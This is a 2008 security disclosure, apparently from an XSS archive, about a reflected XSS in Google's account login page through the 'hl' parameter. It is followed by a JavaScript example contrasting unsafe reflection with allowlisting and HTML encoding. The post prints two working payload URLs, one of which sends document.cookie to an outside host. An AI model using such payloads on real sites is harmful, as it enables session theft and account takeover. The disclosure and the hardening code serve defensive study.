Google accounts SSL login page suffers from highly critical XSS

Nov 13, 2008 | Category: Google Vulns

In this case, the fact that SSL is used on the login page does not necessarily mean that users’ login information is secure. UPDATE: this was fixed a few hours after publishing it.

Malicious people can exploit this Google XSS to propagate malware, spyware and adware, and to steal authentication credentials.

Mirror:
http://www.xssed.com/mirror/54247/

XSS:

https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone

Redirection and document.cookie PoC:

https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e'"><SCRIPT>location.href+%3D+'http%3A%2F%2Fwww.xssed.com/?'%2Bdocument.cookie<%2FSCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone

Mirror of similar old Google XSS (now fixed):
http://www.xssed.com/mirror/25472/

Security researcher “Xylitol” is credited with the discovery of this critical bug.

It is only a matter of minutes before we see it fixed by Google.
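
The reflection behind the URLs above, as an added example that is not from the original post or from Google's code: the `hl` parameter echoed unencoded into a hypothetical page template, next to a version that allowlists the language code and HTML-encodes it on output. The template, the `SUPPORTED_LANGS` list and all function names are assumptions; the sample URL is the first URL above with its trailing parameters dropped.

```javascript
// Added example: handling the reflected `hl` parameter safely.
// The template is hypothetical; the real login page markup is not on this page.

// First URL from the post, shortened to the `service` and `hl` parameters.
const SAMPLE_URL =
  "https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer" +
  "&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E" +
  "%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En";

// Languages this hypothetical login page ships (assumption).
const SUPPORTED_LANGS = new Set(["en", "fr", "de", "it", "pt-BR"]);

// Encode the characters that matter in HTML text and quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Vulnerable form: the decoded parameter is concatenated into the markup,
// so the quote characters and </title> in the value end the intended context.
function renderVulnerable(url) {
  const hl = new URL(url).searchParams.get("hl") ?? "en";
  return `<html lang='${hl}'><head><title>Sign in (${hl})</title></head></html>`;
}

// Hardened form, step 1: only known language codes pass; anything else is "en".
function pickLang(raw) {
  return SUPPORTED_LANGS.has(raw) ? raw : "en";
}

// Hardened form, step 2: encode on output even though the value is allowlisted.
function renderHardened(url) {
  const safe = escapeHtml(pickLang(new URL(url).searchParams.get("hl")));
  return `<html lang='${safe}'><head><title>Sign in (${safe})</title></head></html>`;
}

// Regression check: did request-supplied markup survive into the response?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

console.log("vulnerable:", containsInjectedScript(renderVulnerable(SAMPLE_URL)));
console.log("hardened:  ", containsInjectedScript(renderHardened(SAMPLE_URL)));
```

Because the injected script runs inside the page's own HTTPS origin, transport encryption does not change the outcome; only the server-side handling of `hl` does.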
